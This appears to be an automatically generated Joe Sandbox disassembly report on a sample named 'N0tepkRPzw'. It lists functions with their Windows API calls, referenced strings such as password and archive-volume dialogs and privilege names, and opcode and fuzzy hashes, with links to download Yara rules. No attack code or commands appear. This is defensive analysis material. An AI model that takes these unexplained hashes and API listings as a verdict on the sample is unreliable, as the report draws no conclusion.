Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: ce9cfbfd87fcfec1ee67b049fd26dc74a09d2d85aa5ccdf5cd96d2c03913b5e5
Instruction ID: fb360553552f34e56e9317e27a2b858095441f1a44e095f70a99d2c84f2fc336
Opcode Fuzzy Hash: ce9cfbfd87fcfec1ee67b049fd26dc74a09d2d85aa5ccdf5cd96d2c03913b5e5
Instruction Fuzzy Hash: DB01C032641215E7CB1177689C15A7FBB7EEF81B52F080225BD90F7292DE738C158AB2

Function 00D6CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

EndDialog.USER32(?,00000001), ref: 00D6CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D6CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6CD05
SetDlgItemTextW.USER32(?,00000068), ref: 00D6CD14

Strings

RENAMEDLG, xrefs: 00D6CCA8

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 07ee2ee1b79c153dd1fbaf01dd8cad023d1da008a8a483f31136d8011413f927
Instruction ID: 34d64aa6299358bf59a5893d82ecc9f3c7a1719146333d6c2682e6e88db18eda
Opcode Fuzzy Hash: 07ee2ee1b79c153dd1fbaf01dd8cad023d1da008a8a483f31136d8011413f927
Instruction Fuzzy Hash: 18012433294310BBD6215F699C08F773B6DEB5AB42F150911F3C6E21E0C6A1A908CB75

Function 00D775C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D77573,00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002), ref: 00D775E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D775F5
FreeLibrary.KERNEL32(00000000,?,?,?,00D77573,00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002), ref: 00D77618

Strings

mscoree.dll, xrefs: 00D775DB
CorExitProcess, xrefs: 00D775ED

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0e4c40bbac0ac134848d5abadf4257de4766fc5f65646034af2c65faaace954b
Instruction ID: cb5948d69dbcf568aa4306451efc6551f8212cafd50e4aa6669983c424d41567
Opcode Fuzzy Hash: 0e4c40bbac0ac134848d5abadf4257de4766fc5f65646034af2c65faaace954b
Instruction Fuzzy Hash: CFF04F34A1861CBBDB15AF95DC09B9DBFB9EF04B11F044168F809E2260EB308A44CBB4

Function 00D5EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5EB92
GetProcAddress.KERNEL32(00D981C0,CryptUnprotectMemory), ref: 00D5EBA2

Strings

Crypt32.dll, xrefs: 00D5EB7C
CryptUnprotectMemory, xrefs: 00D5EB98
CryptProtectMemory, xrefs: 00D5EB8C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 3f8e15a3f3bb7719c4a199e3b585866c6188490d52aa309f1d8b3d08e53817b9
Instruction ID: 6d361b4efb6791cb92b652b497011a12ad62d52a6386458e3170cf02519f9366
Opcode Fuzzy Hash: 3f8e15a3f3bb7719c4a199e3b585866c6188490d52aa309f1d8b3d08e53817b9
Instruction Fuzzy Hash: F6E04F70410751AFCF20BF39DC08B42BFE45B14B02B04881DE8DAD3240D6B4D5488F70

Function 00D77DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D77E4B
_free.LIBCMT ref: 00D77E6B

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e240c91473a093255c495ed43fda41c3364254b2e32275d393f811d20fedc1a
Instruction ID: c0e9f5bba0f566bf53acc7081101ee6c3851b8b585dc5fda02ca8948e2a9684e
Opcode Fuzzy Hash: 5e240c91473a093255c495ed43fda41c3364254b2e32275d393f811d20fedc1a
Instruction Fuzzy Hash: 1C41A136A003049BDB24DF78C881A5EB7A6EF85714B1589A9E519EB351FB31ED01CBA0

Function 00D7B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D7B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B63C

Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7B662
_free.LIBCMT ref: 00D7B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7B684

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d1251b9451375bc5842c0af420843f13fd474e516e65f4eb015ebf43051951a1
Instruction ID: b0fc784842e24558a0d20e982e8665ea986571103c46814a3e2b0f469e6a4dc2
Opcode Fuzzy Hash: d1251b9451375bc5842c0af420843f13fd474e516e65f4eb015ebf43051951a1
Instruction Fuzzy Hash: 09017572601715BB632116765C8CD7F696DDAC6FB1319811ABA0CC6210FF60CD0192B0

Function 00D79029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00D7895F,00D785FB,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D7902E
_free.LIBCMT ref: 00D79063
_free.LIBCMT ref: 00D7908A
SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D79097
SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D790A0

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 417622412443549136b832f682cf17027a2505a28d6fa63cd48ae8cd5ebec514
Instruction ID: 6b2cc97d2a874547d6fd107231a42ecbae2c308cc7bbc3e36dfa33e76d9f3604
Opcode Fuzzy Hash: 417622412443549136b832f682cf17027a2505a28d6fa63cd48ae8cd5ebec514
Instruction Fuzzy Hash: B901F477565B006EC32227356CAA92B671EDBC17B13288024F50DD2292FF60CC015274

Function 00D6075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00D60A41: ResetEvent.KERNEL32(?), ref: 00D60A53
Part of subcall function 00D60A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D60A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D6078F
CloseHandle.KERNEL32(?,?), ref: 00D607A9
DeleteCriticalSection.KERNEL32(?), ref: 00D607C2
CloseHandle.KERNEL32(?), ref: 00D607CE
CloseHandle.KERNEL32(?), ref: 00D607DA

Part of subcall function 00D6084E: WaitForSingleObject.KERNEL32(?,000000FF,00D60A78,?), ref: 00D60854
Part of subcall function 00D6084E: GetLastError.KERNEL32(?), ref: 00D60860

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: b7865ca7c27fe8b8eb8d1a16896f18cf7ab3c61758d5cc14bfdb8969b002fc45
Instruction ID: 9f04555f2ea9482cb455301e4e450d45d64f4a46d3ea117204980ced7644181e
Opcode Fuzzy Hash: b7865ca7c27fe8b8eb8d1a16896f18cf7ab3c61758d5cc14bfdb8969b002fc45
Instruction Fuzzy Hash: 96015E72550704EFC7229F69DD84F8ABBE9FB49B50F000529F15E82264CB756A48DBB0

Function 00D7BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D7BF28

Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506

_free.LIBCMT ref: 00D7BF3A
_free.LIBCMT ref: 00D7BF4C
_free.LIBCMT ref: 00D7BF5E
_free.LIBCMT ref: 00D7BF70

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 21407bd6bdb94eb3e445ba1f448631c5de4bb84864cfc4e6e79d1f75fdce6087
Instruction ID: 91f9b2a083c69a376cb4a3246993a3677487ebfb44de3d97ba83f60b44ed47b2
Opcode Fuzzy Hash: 21407bd6bdb94eb3e445ba1f448631c5de4bb84864cfc4e6e79d1f75fdce6087
Instruction Fuzzy Hash: E7F0F432514211A7C624EB55ED8AD1AB3DAFE00724758C806F10CD7A11EB61FC444E74

Function 00D78060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D7807E

Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506

_free.LIBCMT ref: 00D78090
_free.LIBCMT ref: 00D780A3
_free.LIBCMT ref: 00D780B4
_free.LIBCMT ref: 00D780C5

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7a751562dd071b2dbac669891d2692734b744ad78e047f97fe745dab153b4740
Instruction ID: ca7bf6c6c0696452be3ac9ccd2c07369b85da3d2f873e1687dff22a765ecad90
Opcode Fuzzy Hash: 7a751562dd071b2dbac669891d2692734b744ad78e047f97fe745dab153b4740
Instruction Fuzzy Hash: C9F03A78851325CBC7156F1ABC2A8093B66FB15724358870AF418D7B70EB710851AFF9

Function 00D57574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D57579

Part of subcall function 00D53B3D: __EH_prolog.LIBCMT ref: 00D53B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D57640

Part of subcall function 00D57BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57C04
Part of subcall function 00D57BF5: GetLastError.KERNEL32 ref: 00D57C4A
Part of subcall function 00D57BF5: CloseHandle.KERNEL32(?), ref: 00D57C59

Strings

SeRestorePrivilege, xrefs: 00D575D3
SeSecurityPrivilege, xrefs: 00D575BE

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 50d41e784b6358427d819e07c5126cf53175bf1d0e8e85878b5fd9dc69900b92
Instruction ID: dd50360b038fb94743cd39003df42c09341906c91232472da09f0fe4129c6614
Opcode Fuzzy Hash: 50d41e784b6358427d819e07c5126cf53175bf1d0e8e85878b5fd9dc69900b92
Instruction Fuzzy Hash: A5317E71908248AEEF20EB68EC41BEE7B69EF15755F14405AFC44E7292DB708A48CB71

Function 00D6A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

EndDialog.USER32(?,00000001), ref: 00D6A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D6A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6A4E2

Strings

ASKNEXTVOL, xrefs: 00D6A448

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 6b9453e4f8052a47640e6cf3a32ad31269973bf0cebb32daeee3130b381952c8
Instruction ID: c09f71a70a5ef14dfa92909e9c5ca44e0703a866e04e115c167fb100de1b2640
Opcode Fuzzy Hash: 6b9453e4f8052a47640e6cf3a32ad31269973bf0cebb32daeee3130b381952c8
Instruction Fuzzy Hash: 4A118132244304EFDA219F6C9C4DF663BA9EB4A741F140205F689EA1A0CBA1E915DB32

Function 00D5D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00D5D22E
_strncpy.LIBCMT ref: 00D5D278

Strings

$%s, xrefs: 00D5D223
@%s, xrefs: 00D5D218

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 98ddb910e3bf25ccc0709a310e2ea6763ef86d0e015d3b5ef9f603bc0c2d8124
Instruction ID: 33c9ee64e110540540e6a0b4ccafe53d27a3a433d86451a52e120865a1c056cd
Opcode Fuzzy Hash: 98ddb910e3bf25ccc0709a310e2ea6763ef86d0e015d3b5ef9f603bc0c2d8124
Instruction Fuzzy Hash: 98215E32440348AEDF30AEA4CC06FDE7BA9EF05701F044512FE1596191E371DA599B76

Function 00D6A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

EndDialog.USER32(?,00000001), ref: 00D6A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D6A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00D6AA24

Strings

GETPASSWORD1, xrefs: 00D6A9A9

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 9b099f11ccc841d08b6f70412b6673b8a99ac692d94e76feeccced0175995879
Instruction ID: 6c15822f0548da6467f87a58b77e3bda16bc0a1cdf69a6ed665383904a34202b
